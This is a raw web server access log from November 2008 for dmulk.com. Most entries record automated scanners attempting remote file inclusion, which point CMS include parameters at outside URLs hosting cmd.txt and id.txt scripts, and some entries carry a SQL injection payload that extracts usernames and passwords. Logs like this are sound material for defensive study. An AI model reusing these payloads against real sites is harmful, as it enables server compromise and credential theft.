81.226.217.113 - - [04/Nov/2008:12:13:40 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:13:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:13:42 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:13:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:13:43 -0800] "GET /logs/access_070724.log/index.php?lang=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:13:51 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:13:51 -0800] "GET /errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:13:51 -0800] "GET /logs/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:13:52 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:12:14:02 -0800] "GET //vwar/backup/errors.php?error=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:12:14:02 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:14:34 -0800] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:12:14:44 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.61.84.148 - - [04/Nov/2008:12:14:57 -0800] "GET /logs/access_071027.log HTTP/1.0" 200 191919 "http://www.google.fr/search?hl=fr&q=image+de+chanbord&btnG=Recherche+Google&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; MyIE2; Maxthon)" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:12:14:58 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:12:15:17 -0800] "GET /phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:12:15:23 -0800] "GET /logs/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:12:15:28 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:15:49 -0800] "GET /logs/access_080125.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:15:49 -0800] "GET /logs/access_080819.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:15:49 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:15:49 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:12:16:03 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:12:16:13 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:12:16:13 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:12:16:13 -0800] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:12:16:13 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:16:19 -0800] "GET /logs/access_080819.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:16:19 -0800] "GET /logs/access_080125.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:16:19 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.52.204.157 - - [04/Nov/2008:12:16:19 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.135.199.29 - - [04/Nov/2008:12:16:26 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.135.199.29 - - [04/Nov/2008:12:16:26 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
222.239.227.25 - - [04/Nov/2008:12:16:54 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.227.25 - - [04/Nov/2008:12:16:54 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.227.25 - - [04/Nov/2008:12:16:54 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.227.25 - - [04/Nov/2008:12:16:54 -0800] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:17:07 -0800] "GET /logs/access.log//common/db.php?commonpath=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:17:23 -0800] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:17:23 -0800] "GET //vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:17:23 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:17:27 -0800] "GET /logs/access_080919.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:17:34 -0800] "GET /logs/access_080401.log/?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:17:36 -0800] "GET /?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 200 94800 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:17:38 -0800] "GET /logs/?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 200 72163 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:17:55 -0800] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.98.74.21 - - [04/Nov/2008:12:19:05 -0800] "GET /logs/access_080905.log HTTP/1.1" 200 840070 "http://www.google.fr/search?hl=fr&q=www.enes92.ml&btnG=Rechercher&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
201.6.118.215 - - [04/Nov/2008:12:19:06 -0800] "GET /admin/index.php?o=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [04/Nov/2008:12:19:06 -0800] "GET /logs/access_080921.log//admin/index.php?o=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [04/Nov/2008:12:19:06 -0800] "GET /logs/access_080527.log//admin/index.php?o=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [04/Nov/2008:12:19:06 -0800] "GET /logs//admin/index.php?o=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:12:19:15 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:12:19:15 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:19:16 -0800] "GET /logs//calendar/myevent.php?myevent_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:19:16 -0800] "GET /calendar/myevent.php?myevent_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:19 -0800] "GET /logs/access_080526.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:19 -0800] "GET /logs/access_080124.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:19 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:21 -0800] "GET /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 200 95342 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:23 -0800] "GET /logs/access_080526.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:23 -0800] "GET /logs/access_080124.log//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:23 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:23 -0800] "GET /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 200 95390 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.185.43 - - [04/Nov/2008:12:19:28 -0800] "GET /logs/access_070712.log HTTP/1.0" 200 114624 "http://www.google.co.za/search?hl=en&q=CLUB&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:29 -0800] "GET /logs/access_080815.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:29 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:29 -0800] "GET /logs/access_080412.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:30 -0800] "GET /index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 200 94906 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:31 -0800] "GET /logs/access_080412.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:31 -0800] "GET /logs/access_080815.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:31 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:19:32 -0800] "GET /index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 200 94890 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:20:05 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:20:05 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:20:05 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:12:20:05 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:12:20:24 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:20:49 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:20:55 -0800] "GET /logs/access_080321.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:21:44 -0800] "GET /logs/access_080815.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:21:44 -0800] "GET /logs/access_080412.log/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:21:44 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:21:44 -0800] "GET /index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 200 94871 "-" "libwww-perl/5.53" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:22:29 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.170.187 - - [04/Nov/2008:12:22:34 -0800] "GET /index.php?page=http://rubi4.freehostia.com/comp-id.txt?? HTTP/1.1" 200 94658 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:42 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:42 -0800] "GET /logs/access_080531.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:42 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:44 -0800] "GET /logs/access_080531.log//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:44 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:12:22:44 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:22:55 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:22:55 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:22:55 -0800] "GET /logs/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:12:22:55 -0800] "GET /errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:12:22:58 -0800] "GET /logs/access_080228.log HTTP/1.0" 200 1441792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.160.206.87 - - [04/Nov/2008:12:23:07 -0800] "GET /bikes/dteel/2008_10_18/IMG_5421s.JPG HTTP/1.1" 200 275171 "http://www.st-owners.com/forums/showthread.php?t=42795&page=32" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
71.165.227.47 - - [04/Nov/2008:12:23:07 -0800] "GET /bikes/dteel/2008_10_18/IMG_5413s.JPG HTTP/1.1" 200 341410 "http://www.st-owners.com/forums/showthread.php?t=42795&page=32" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:23:39 -0800] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:23:39 -0800] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:23:47 -0800] "GET /logs/access_080412.log%20/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:12:24:12 -0800] "GET /logs/access_080412.log%20/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
70.86.205.130 - - [04/Nov/2008:12:24:26 -0800] "GET /logs/access_080412.log%20/index.php?option=com_custompages&cpage=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:25:29 -0800] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:25:42 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 65194 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:26:05 -0800] "GET /logs/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:26:05 -0800] "GET /administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:26:07 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:26:07 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:26:18 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 65194 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:12:26:27 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 65194 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.69.254.245 - - [04/Nov/2008:12:26:29 -0800] "GET /logs/access_070924.log HTTP/1.1" 200 106285 "http://search.yahoo.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; T312461)" "www.dmulk.com"
